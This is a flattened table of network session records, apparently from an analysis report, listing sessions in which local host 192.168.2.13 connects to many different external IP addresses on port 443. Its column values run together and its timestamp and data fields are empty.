                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17225192.168.2.134842842.152.139.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17226192.168.2.1350350181.146.223.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17227192.168.2.1342672201.85.250.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17228192.168.2.1347922164.82.57.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17229192.168.2.133582866.190.92.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17230192.168.2.1337670157.10.205.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17231192.168.2.1334850102.170.23.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17232192.168.2.1343834141.60.154.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17233192.168.2.1351676115.161.14.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17234192.168.2.1357824138.24.11.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17235192.168.2.1335418143.174.167.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17236192.168.2.1357890124.193.237.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17237192.168.2.134938023.246.226.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17238192.168.2.134721298.164.73.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17239192.168.2.135823623.25.112.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17240192.168.2.1335024144.236.211.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17241192.168.2.1350930178.226.115.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17242192.168.2.135921668.65.17.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17243192.168.2.135835653.244.86.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17244192.168.2.1346642122.128.97.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17245192.168.2.135322824.237.160.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17246192.168.2.135562284.52.234.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17247192.168.2.1338330152.7.128.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17248192.168.2.1340972201.232.220.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17249192.168.2.135701497.162.44.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17250192.168.2.1343936208.155.141.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17251192.168.2.134068439.154.23.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17252192.168.2.135274867.71.121.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17253192.168.2.135581220.92.135.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17254192.168.2.1333820207.23.36.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17255192.168.2.135310062.236.185.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17256192.168.2.135595648.254.16.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17257192.168.2.1358812203.187.28.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17258192.168.2.1336990135.93.58.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17259192.168.2.1347712130.228.5.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17260192.168.2.1356926150.86.183.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17261192.168.2.135191859.41.223.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17262192.168.2.135062412.61.52.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17263192.168.2.1346474216.220.152.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17264192.168.2.135266871.74.44.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17265192.168.2.1346378120.95.77.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17266192.168.2.1355352153.67.111.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17267192.168.2.135224876.206.244.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17268192.168.2.1353510190.13.106.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17269192.168.2.1339246141.230.120.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17270192.168.2.1337604193.0.52.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17271192.168.2.1355088222.213.151.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17272192.168.2.1332938133.226.59.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17273192.168.2.133514680.72.198.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17274192.168.2.1338902200.187.144.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17275192.168.2.1341780148.208.58.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17276192.168.2.1357926154.167.59.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17277192.168.2.1359696182.99.58.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17278192.168.2.1354906150.128.228.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17279192.168.2.1338460184.105.49.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17280192.168.2.1344508138.170.170.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17281192.168.2.134639057.90.95.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17282192.168.2.133847889.151.54.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17283192.168.2.134011474.145.220.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17284192.168.2.135590466.157.23.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17285192.168.2.1358080184.62.144.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17286192.168.2.135480244.168.64.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17287192.168.2.1344772162.104.245.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17288192.168.2.1350522194.214.236.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17289192.168.2.134502688.33.205.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17290192.168.2.134584250.123.23.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17291192.168.2.1349556207.222.118.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17292192.168.2.1333748209.152.125.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17293192.168.2.1335354177.85.70.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17294192.168.2.133976259.251.23.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17295192.168.2.135945854.60.89.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17296192.168.2.1333676151.202.86.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17297192.168.2.1348804141.72.84.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17298192.168.2.135792649.91.97.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17299192.168.2.135947484.38.50.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17300192.168.2.1352736193.141.19.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17301192.168.2.133662088.109.201.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17302192.168.2.135843812.159.211.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17303192.168.2.134990019.230.124.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17304192.168.2.1337682216.77.235.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17305192.168.2.1356102196.132.254.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17306192.168.2.13508085.159.118.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17307192.168.2.1334604145.185.59.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17308192.168.2.1350476202.75.208.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17309192.168.2.1344590148.81.247.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17310192.168.2.135604623.160.160.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17311192.168.2.1336150222.123.23.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17312192.168.2.133612417.139.108.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17313192.168.2.1349860173.21.225.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17314192.168.2.135813278.193.50.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17315192.168.2.1348572157.6.61.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17316192.168.2.135537491.45.206.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17317192.168.2.1333054161.125.199.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17318192.168.2.134639896.224.153.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17319192.168.2.134040495.61.218.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17320192.168.2.135884277.114.219.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17321192.168.2.135004427.72.123.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17322192.168.2.135874291.227.248.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17323192.168.2.135975840.4.54.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17324192.168.2.133849657.138.231.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17325192.168.2.1346626197.147.35.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17326192.168.2.1347038101.174.172.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17327192.168.2.1344316135.16.111.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17328192.168.2.1336294195.55.41.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17329192.168.2.1341214162.236.190.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17330192.168.2.1347814108.24.105.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17331192.168.2.1340604175.220.85.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17332192.168.2.1343752138.23.133.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17333192.168.2.1346050195.89.147.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17334192.168.2.1352154147.167.38.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17335192.168.2.135258087.47.255.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17336192.168.2.1357394137.227.155.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17337192.168.2.135902672.133.101.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17338192.168.2.1346566139.149.131.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17339192.168.2.1337458198.249.220.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17340192.168.2.1339106178.34.179.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17341192.168.2.133804238.239.121.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17342192.168.2.1356944221.63.213.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17343192.168.2.1345368199.117.221.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17344192.168.2.1337140142.53.136.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17345192.168.2.134466292.144.89.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17346192.168.2.134966053.132.131.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17347192.168.2.1339668140.29.253.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17348192.168.2.1342060167.58.156.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17349192.168.2.1347078124.69.17.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17350192.168.2.1343302154.9.30.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17351192.168.2.1336358101.99.214.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17352192.168.2.1356396221.167.221.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17353192.168.2.13470265.241.107.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17354192.168.2.1338312165.158.59.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17355192.168.2.135509090.25.151.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17356192.168.2.1333804204.164.192.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17357192.168.2.134422896.120.92.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17358192.168.2.1339476152.124.149.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17359192.168.2.134341631.51.46.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17360192.168.2.1356986223.233.190.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17361192.168.2.133926453.150.125.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17362192.168.2.134501635.220.242.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17363192.168.2.1337234146.164.20.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17364192.168.2.1360224175.46.195.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17365192.168.2.1336486147.0.88.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17366192.168.2.1355482113.163.108.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17367192.168.2.134297434.113.238.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17368192.168.2.1345136101.160.171.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17369192.168.2.1347472179.38.255.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17370192.168.2.1359896170.185.63.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17371192.168.2.134436276.190.189.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17372192.168.2.1355152221.46.36.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17373192.168.2.135984897.16.217.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17374192.168.2.1339106160.169.46.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17375192.168.2.1333556143.114.172.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17376192.168.2.1354916104.154.248.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17377192.168.2.133839267.225.73.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17378192.168.2.1335658133.88.187.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17379192.168.2.133648484.71.104.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17380192.168.2.134344814.253.189.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17381192.168.2.1355078173.184.51.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17382192.168.2.1357612218.178.11.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17383192.168.2.1334088201.159.76.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17384192.168.2.135769652.1.40.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17385192.168.2.133824077.248.193.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17386192.168.2.1342892220.21.221.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17387192.168.2.134129023.193.110.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17388192.168.2.133560478.90.234.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17389192.168.2.13459882.3.90.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17390192.168.2.133322849.246.101.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17391192.168.2.1344326106.164.123.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17392192.168.2.134351267.189.190.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17393192.168.2.13466944.83.1.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17394192.168.2.133686063.160.91.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17395192.168.2.135734849.37.101.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17396192.168.2.1349244150.121.80.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17397192.168.2.135752823.130.250.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17398192.168.2.1346152213.219.19.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17399192.168.2.134045224.48.42.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17400192.168.2.13389069.196.252.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17401192.168.2.1336524218.54.18.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17402192.168.2.1346350114.57.147.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17403192.168.2.1340698196.2.32.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17404192.168.2.1339954108.155.110.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17405192.168.2.1351962216.186.157.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17406192.168.2.135829645.138.230.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17407192.168.2.1353246174.41.95.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17408192.168.2.1348588153.215.35.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17409192.168.2.133601467.210.197.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17410192.168.2.135956861.14.249.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17411192.168.2.1336550167.62.54.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17412192.168.2.1346098205.182.141.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17413192.168.2.1336470157.191.222.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17414192.168.2.1360406210.180.208.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17415192.168.2.134986834.165.213.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17416192.168.2.1359366156.159.136.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17417192.168.2.134914481.157.163.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17418192.168.2.134568490.164.221.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17419192.168.2.1344294190.31.26.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17420192.168.2.1352294118.66.66.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17421192.168.2.133311212.109.81.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17422192.168.2.135062658.170.206.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17423192.168.2.135768261.201.48.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17424192.168.2.134899051.36.191.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17425192.168.2.135374627.193.0.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17426192.168.2.1353652194.80.130.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17427192.168.2.135315441.63.165.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17428192.168.2.1355872198.50.84.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17429192.168.2.1339024186.68.127.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17430192.168.2.1337078223.117.96.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17431192.168.2.136059285.249.163.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17432192.168.2.135090613.176.252.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17433192.168.2.1335772121.254.32.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17434192.168.2.1346382178.128.24.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17435192.168.2.135573264.45.55.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17436192.168.2.1360660137.169.170.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17437192.168.2.135332454.209.3.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17438192.168.2.1332878222.55.102.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17439192.168.2.1357870137.179.182.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17440192.168.2.1349620122.127.18.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17441192.168.2.134797650.81.169.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17442192.168.2.1346998193.23.109.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17443192.168.2.133492890.34.12.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17444192.168.2.1335658186.66.125.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17445192.168.2.134245261.158.104.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17446192.168.2.1359102116.37.228.85443
